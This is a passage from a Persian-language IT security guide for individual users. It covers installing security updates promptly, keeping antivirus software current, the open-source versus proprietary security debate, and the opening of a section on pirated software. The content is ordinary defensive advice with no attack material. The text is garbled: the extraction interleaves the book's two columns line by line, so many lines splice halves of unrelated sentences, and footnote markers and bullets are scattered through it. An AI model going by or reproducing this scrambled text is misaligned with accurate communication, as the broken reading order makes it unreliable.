‫ﺍﻣﻨﻴﺘﻲ ﻧﺪﺍﺭﻧـﺪ‪ ،‬ﺑﻠﻜـﻪ ﺑـﺮﺍﻱ ﺣـﻞ ﻣـﺸﻜﻼﺕ ﻏﻴﺮﺍﻣﻨﻴﺘـﻲ ﻭ ﻳـﺎ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻨﺪ ﺳﺮﻳﻌﹰﺎ ﻣﻮﺭﺩ ﺗﻬﺎﺟﻢ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪.‬‬
‫ﺍﻓﺰﻭﺩﻥ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺟﺪﻳﺪ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺑـﺎ ﺍﻳﻨﺤـﺎﻝ ﺑﺮﺧـﻲ ﺍﺯ‬ ‫ﭘﻴﺸﻨﻬﺎﺩ ﻋﻤﻠﻲ‪:‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﮕﺎﻥ ﻧﻈﻴﺮ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‪ ٣٢‬ﻭ ﻳﺎ ﻭﻳﺮﻭﺱﻳﺎﺏ‪ ٣٣‬ﺩﺭ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻣﺒﺘﺪﻱ ﻭ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﺸﺎﻥ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻱ‬ ‫•‬
‫ﺣﻴﻄﺔ ﺑﺮﺭﺳﻲ ﻣﺎ ﻫﺴﺘﻨﺪ ﻭ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﻣـﻮﺭﺩ ﺁﻧﻬـﺎ ﺑﺤـﺚ‬
‫ﻏﻴﺮﺣﺴﺎﺱ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ﺑﺎﻳـﺪ ﻛﻠﻴـﺔ ﺑـﺴﺘﻪﻫـﺎﻱ‬
‫ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺑﻼﻓﺎﺻﻠﻪ ﺑﻌﺪ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﺑﻜﺎﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺑﺮﺍﻱ‬
‫ﺍﮔﺮ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ ﻛـﻪ ﺩﺍﺭﺍﻱ ﻛﺎﺭﻛﺮﺩﻫـﺎﻱ‬ ‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺸﺪﻩ‪ ،‬ﺧﻄﺮ ﻣـﺸﻜﻼﺕ ﺟﺪﻳـﺪ‬
‫ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺖ ﻓﺮﻭﺷـﻨﺪﻩ ﺩﺭ‬ ‫ﺣﺎﺻﻞ ﺍﺯ ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺑـﻪ ﻣﺮﺍﺗـﺐ ﻛﻤﺘـﺮ ﺍﺯ‬
‫ﺍﺭﺍﺋﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺩﺭﻙ ﻛـﺮﺩﻩﺍﻳـﺪ‪ .‬ﻣـﺴﻠﻤﹰﺎ ﻧﻤـﻲﺧﻮﺍﻫﻴـﺪ ﺩﺭ‬ ‫ﺧﻄﺮﺍﺕ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻧﺸﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻣﻮﻗﻌﻴﺘﻲ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺍﺯ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺣـﺴﺎﺱ ﺑـﻪ ﺍﻣﻨﻴـﺖ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺣﺮﻓﻪﺍﻱ ﻭ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﺶ ﻓﻨﻲ ﺑﺎﻳﺪ ﺑـﺴﺘﻪﻫـﺎﻱ‬ ‫•‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺳﺮﻳﻌﹰﺎ ﻧﺼﺐ ﻛﻨﻨﺪ‪ ،‬ﺍﻣـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫‪32‬‬ ‫‪Firewall‬‬
‫‪33‬‬ ‫‪Virus Scanner‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٦٨‬‬

‫ﺁﺧﺮﻳﻦ ﻧﻜﺘﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ ﻛﻤﻲ ﺑﺤﺚ ﻣـﻲﻃﻠﺒـﺪ‪.‬‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﻧﺎﮔﻬﺎﻥ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺭﺍﺋﻪ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺁﻥ‬
‫ﻣﺒﺎﺣﺜـﻪﺍﻱ ﻣﻴـﺎﻥ ﻃﺮﻓـﺪﺍﺭﺍﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻣـﺘﻦﺑـﺎﺯ ﻭ ﻃﺮﻓــﺪﺍﺭﺍﻥ‬ ‫ﻗﻄﻊ ﺷﻮﺩ ﻭ ﻳﺎ ﺗﻮﺍﻧﺎﻳﻲ ﺧﺮﻳـﺪ ﺁﻧـﺮﺍ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ‪ .‬ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺳﻨﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻻﺧﺮﻩ ﻛـﺪﺍﻣﻴﻚ‬ ‫ﺑﺮﺧﻲ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻣﺎﻧﻨﺪ ﻭﻳﺮﻭﺱ ﻳﺎﺑﻬﺎ ﺍﮔﺮ ﺑﻄﻮﺭ ﻣﻨﻈﻢ )ﺭﻭﺯﺍﻧـﻪ ﻳـﺎ‬
‫ﺍﺯ ﺍﻳﻦ ﻣﺤﺼﻮﻻﺕ ﺍﻳﻤﻦﺗﺮ ﻫﺴﺘﻨﺪ‪.‬‬ ‫ﻫﻔﺘﮕﻲ( ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺸﻮﻧﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺧﻄﺮﻧﺎﻛﺘﺮ ﺍﺯ ﺣـﺎﻟﺘﻲ‬
‫ﺑﺎﺷﺪ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﺷـﻮﺩ؛ ﺯﻳـﺮﺍ ﺍﮔـﺮ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻃﺮﻓﺪﺍﺭﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﻣﻌﺘﻘﺪﻧﺪ‪:‬‬
‫ﻧﻤﺎﻳﻴﺪ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﺷﺮﺍﻳﻂ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻳﺪ‪.‬‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻣﺤﺼﻮﻻﺕ ﻣﺘﻦﺑﺎﺯ ﺩﺭ ﺩﺳـﺘﺮﺱ‬ ‫•‬
‫‪٣٤‬‬
‫ﺍﺳﺖ‪ ،‬ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﻪ ﺳﺎﺩﮔﻲ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺗﺠﺰﻳﻪ ﻭ‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ‬
‫ﺗﺤﻠﻴﻞ ﻛﻨﻨـﺪ ﻭ ﺗﻤـﺎﻣﻲ ﺍﺷـﻜﺎﻻﺗﻲ ﻛـﻪ ﺍﺯ ﻃﺮﻳـﻖ ﺁﻧﻬـﺎ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯﻱ ﻛﻪ ﺑﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﮔـﺴﺘﺮﺵ ﻫـﺴﺘﻨﺪ‬
‫ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﻧﻔﻮﺫ ﻛﺮﺩ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻨﺎﺳﺒﻲ ﻣـﻮﺭﺩ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﺩﺭ‬
‫ﭼﻮﻥ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺩﺭ ﻣﻨـﺎﻃﻖ ﻣﺨﺘﻠـﻒ ﻭ ﺑـﺪﻭﻥ ﺭﻭﺍﺑـﻂ‬ ‫•‬ ‫ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺑﺎ ﺍﻳﻨﻜﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺍﺻﻠﻲ ﺑـﺼﻮﺭﺕ ﺭﺍﻳﮕـﺎﻥ ﻋﺮﺿـﻪ‬
‫ﺳﺎﺯﻣﺎﻧﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﻣﺤـﺼﻮﻻﺕ ﻣـﺘﻦﺑـﺎﺯ ﻛـﺎﺭ‬ ‫ﻣﻲ ﺷﻮﺩ ﺍﻣﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻳﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻛﻨﻨﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻧﺎﺩﻳـﺪﻩ ﮔﺮﻓﺘـﻪ ﺷـﻮﻧﺪ ﻭ‬ ‫ﺁﻥ ﻫﺰﻳﻨﻪﺑﺮ ﺑﺎﺷﺪ‪ .‬ﻧﺴﺨﺔ ﺭﺍﻳﮕـﺎﻥ ‪ Red Hat Linux‬ﻛـﻪ ﺩﺭ‬
‫ﻓﻘــﺪﺍﻥ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺭ ﺍﺟــﺰﺍﻱ ﻣﺨﺘﻠــﻒ ﻣﻨﺠــﺮ ﺑــﻪ‬ ‫ﺩﺳﺘﺮﺱ ﻋﻤـﻮﻡ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻧﻤﻮﻧـﺔ ﺧـﻮﺑﻲ ﺍﺯ ﺍﻳـﻦ ﻗﺒﻴـﻞ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﮔﺮﺩﺩ‪.‬‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺍﺳﺖ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺧﻮﺍﻫـﺎﻥ ﺳـﻄﺢ ﺑﻴـﺸﺘﺮﻱ ﺍﺯ‬
‫ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﻣﺤﺼﻮﻻﺕ ﺍﻧﺤﺼﺎﺭﻱ ﺑﻪ‬ ‫•‬ ‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻫﺴﺘﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﺘﺔ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺻﻠﻲ ﻭ ﻳﺎ‬
‫ﺗﻮﻟﻴﺪﻛﻨﻨــﺪﻩ ﻭﺟــﻪ ﻣــﻲﭘﺮﺩﺍﺯﻧــﺪ‪ ،‬ﺩﺳــﺘﻮﺭﺍﺕ ﺍﻭ ﺭﺍ ﺩﻧﺒــﺎﻝ‬ ‫ﺣﺪﺍﻗﻞ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺁﻧﺮﺍ ﺧﺮﻳﺪﺍﺭﻱ ﻛﻨﻨﺪ‪ .‬ﺍﮔـﺮ ﺗـﺼﻤﻴﻢ ﺑـﻪ‬
‫ﻣــﻲﻛﻨﻨــﺪ ﻭ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﺑﺎﻋــﺚ ﻣــﻲﺷــﻮﺩ ﻛﻴﻔﻴــﺖ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺩﺍﺭﻳـﺪ ﻛـﻪ ﺧﺮﻳـﺪ ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺁﻧﻬـﺎ‬
‫ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺑﺎﻻ ﺑﺎﺷﺪ‪.‬‬ ‫ﺭﺍﻳﮕﺎﻥ ﺍﺳـﺖ )ﻣﺜـﻞ ﺑﻌـﻀﻲ ﺍﺯ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﻭ ﻣـﺘﻦﺑـﺎﺯ( ﺗﻮﺟـﻪ‬
‫ﺩﺍﺷﺘﻪﺑﺎﺷﻴﺪ ﻛﻪ ﻣـﺪﺕﺯﻣـﺎﻥ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ ﻫــﻴﭻ ﻣﻨﺒــﻊ ﻣﻌﻴﻨــﻲ ﻣــﺴﺌﻮﻟﻴﺘﻲ ﺩﺭ ﻗﺒــﺎﻝ‬ ‫•‬
‫ﺍﺻــﻼﺣﻲ ﺁﻧﻬــﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﻛﻮﺗــﺎﻩ ﺑﺎﺷــﺪ‪ .‬ﺑﻨــﺎﺑﺮﺍﻳﻦ ﺍﮔــﺮ‬
‫ﻣﺤﺼﻮﻻﺕ ﻣﺘﻦﺑﺎﺯ ﺑﺮ ﻋﻬﺪﻩ ﻧﺪﺍﺭﺩ‪ ،‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺍﻣﻨﻴـﺖ‬ ‫ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻳــﺎ ﺯﻳﺮﺳﻴــﺴﺘﻤﻬﺎﻱ ﻣﻬــﻢ ﺧــﻮﺩ ﺭﺍ ﺍﺯ ﻧــﻮﻉ‬
‫ﺑﺮﺍﻱ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺍﻧﻔـﺮﺍﺩﻱ ﺍﻫﻤﻴـﺖ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪،‬‬ ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺪﻭﻥ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺎﻳﺪ ﻧﺴﺨﺔ ﺟﺪﻳﺪ‬
‫ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛـﻪ ﻧﺎﺩﻳـﺪﻩ ﮔﺮﻓﺘـﻪ‬ ‫ﺁﻧﺮﺍ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ )ﻣﺜ ﹰﻼ ﺩﺭ ﻫﺮ ﺷﺶ ﻣﺎﻩ( ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ‪.‬‬
‫ﺷﻮﺩ‪.‬‬
‫ﺭﻭﻧــﺪ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻣﺤــﺼﻮﻻﺕ ﻣــﺘﻦﺑــﺎﺯ ﺑــﺴﻴﺎﺭ ﻣــﺸﻜﻠﺘﺮ ﺍﺯ‬
‫ﻃﺮﻓﺪﺍﺭﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ ﻣﻌﺘﻘﺪﻧﺪ‪:‬‬ ‫ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻣﺤــﺼﻮﻻﺗﻲ ﻣﺜــﻞ ‪Microsoft Windows‬‬
‫ﺑﻪ ﺩﻟﻴﻞ ﺍﻳﻨﻜﻪ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺑﺎ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻛﺎﺭ‬ ‫•‬ ‫ﺍﺳﺖ؛ ﺍﻣﺎ ﺑﺎ ﻭﺟﻮﺩ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻧـﺼﺐ ﺑـﺮﺍﻱ ﻣﺤـﺼﻮﻻﺕ‬
‫ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻣﺴﺎﺋﻞ ﻭ ﻣﺸﻜﻼﺕ ﺁﻧﻬـﺎ ﺗﻮﺳـﻂ ﺍﻓـﺮﺍﺩ ﺧﺒـﺮﻩ‬ ‫ﺍﺻﻠﻲ ﻣﺘﻦﺑﺎﺯ ﺍﻳﻦ ﻣﺸﻜﻞ ﻫﻢ ﺑﺮﻃﺮﻑ ﻣﻲﺷﻮﺩ‪ .‬ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﺗﺸﺨﻴﺺ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﺳﺮﻳﻌﹰﺎ ﺍﺻﻼﺡ ﻣﻲﮔﺮﺩﺩ‪.‬‬ ‫ﻣﺘﻦﺑﺎﺯ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows‬ﻧﻴﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ‬
‫ﻛﺎﻣﭙﺎﻳﻞﺷﺪﻩ ﺗﻮﺯﻳﻊ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺯ ﻧﺼﺐﻛﻨﻨﺪﻩﻫﺎﻱ ﺳﺎﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺎ ﻣﺤﺼﻮﻻﺕ ﺍﻧﺤﺼﺎﺭﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻣﻤﻜﻦ‬ ‫•‬
‫ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺍﺳﺖ ﻛﺪ ﻳﻜﭙﺎﺭﭼﻪ ﺍﻱ ﺭﺍ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﮔﺮ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﻩ‬
‫ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻣﺤﺼﻮﻝ ﺧﻮﺩ ﺍﺭﺯﺵ ﺧﺎﺻـﻲ ﻗﺎﺋـﻞ ﻧـﺸﺪﻩ‬ ‫ﻫﻤﺎﻧﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ ،Windows‬ﺑﺴﺘﻪ ﻫـﺎﻱ ﺑـﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ ﻭ‬
‫ﺑﺎﺷﺪ ﺑﺮﻧﺎﻣﻪ ﻧﻤﻲ ﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻄﺢ ﺍﻳﻤﻨﻲ ﻣﻄﻠﻮﺑﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ‬ ‫ﻭﺻﻠﻪﻫﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺑﺰﺭﮒ‪ ،‬ﺑﺴﺘﻪ ﺑـﻪ‬
‫ﺑﺎﺷﺪ‪.‬‬ ‫ﺍﻧﺪﺍﺯﺓ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺷﻨﺎﺳﺎﻳﻲ ﻣﻨﺎﺑﻊ ﻣﺤﻠﻲ‬
‫ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﻤﻨﻈﻮﺭ ﻛﺎﻫﺶ ﺯﻣﺎﻥ ‪download‬‬
‫ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺑﺮﺍﻱ ﺍﺻﻼﺡ ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ‬ ‫•‬
‫ﺁﻧﻬﺎ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ‪.‬‬
‫ﻫﻤﻴﺸﻪ ﺑﺎﻳﺪ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻣﺤﺼﻮﻝ ﻣﺮﺍﺟﻌﻪ ﻛﺮﺩ ﻭ ﺍﻳـﻦ‬
‫ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺗﺄﺧﻴﺮ ﺯﻣﺎﻧﻲ ﺯﻳﺎﺩﻱ ﺷﻮﺩ‪.‬‬
‫‪34‬‬ ‫‪Open Source Software‬‬
‫‪٦٩‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺩﺭ ﻭﺍﻗﻊ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﺩﻻﻳﻞ ﺩﺭ ﺟﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺻـﺤﻴﺢ ﻫـﺴﺘﻨﺪ‪.‬‬


‫ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﻧﺤﺼﺎﺭﻱ ﻳﺎ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺩﻋﺎ ﻛـﺮﺩ ﻛـﻪ‬
‫ﻛﺸﻒ ﻭ ﺍﺻﻼﺡ ﻣﺸﻜﻼﺕ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺩﺭ ﺯﻣﺎﻥ ﻣﻨﺎﺳﺐ ﺻﻮﺭﺕ‬
‫ﻣﻲﮔﻴﺮﺩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺩﺭ ﻫﺮ ﺩﻭ ﻧﻮﻉ ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ،‬ﻧﻤﻮﻧـﻪﻫـﺎﻳﻲ ﺍﺯ ﺭﻓﺘـﺎﺭ‬
‫ﺍﻳﺪﻩﺁﻝ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﻲﺩﻗﺘﻲ ﻃﺮﺍﺣﺎﻥ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺩﻳﺪﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫‪٣٥‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ‬
‫ﻧﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻭ ﻧﻪ ﻧﺎﺷﺮﺍﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﻫﻴﭽﻜﺪﺍﻡ ﻣﺮﻭﺝ ﺳـﺮﻗﺖ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺳﺎﺩﻩﺍﻧﮕﺎﺭﺍﻧـﻪ ﺍﺳـﺖ ﺍﮔـﺮ ﻭﺍﻧﻤـﻮﺩ ﻛﻨـﻴﻢ‬
‫ﭼﻨﻴﻦ ﻣﺴﺌﻠﻪﺍﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﺳﺮﻗﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺸﻜﻠﻲ ﺍﺳﺖ ﻛـﻪ‬
‫ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻭﻟـﻲ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﺍﺗﻔـﺎﻕ‬
‫ﻣﻲﺍﻓﺘﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﻫﺰﻳﻨﺔ ﻧﺴﺒﻲ ﺗﻬﻴﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻗـﺎﻧﻮﻧﻲ ﺩﺭ‬
‫ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺩﺳﺘﻤﺰﺩﻫﺎ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺯ ﻛـﺸﻮﺭﻫﺎﻱ ﺗﻮﺳـﻌﻪﻳﺎﻓﺘـﻪ‬
‫ﺍﺳﺖ ‪ -‬ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺩﻭﺍﻳﺮ ﻗﻮﺍﻧﻴﻦ ﻣﺤﻠﻲ ﻭ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺑـﺎ‬
‫ﻫﻤﻜﺎﺭﻱ ﻫﻢ ﺍﻧﺠﺎﻡ ﺗﺨﻠﻔﺎﺕ ﺭﺍ ﺑﺴﻴﺎﺭ ﻏﻴﺮ ﻣﺤﺘﻤﻞ ﻣﻲﺳﺎﺯﻧﺪ‪.‬‬
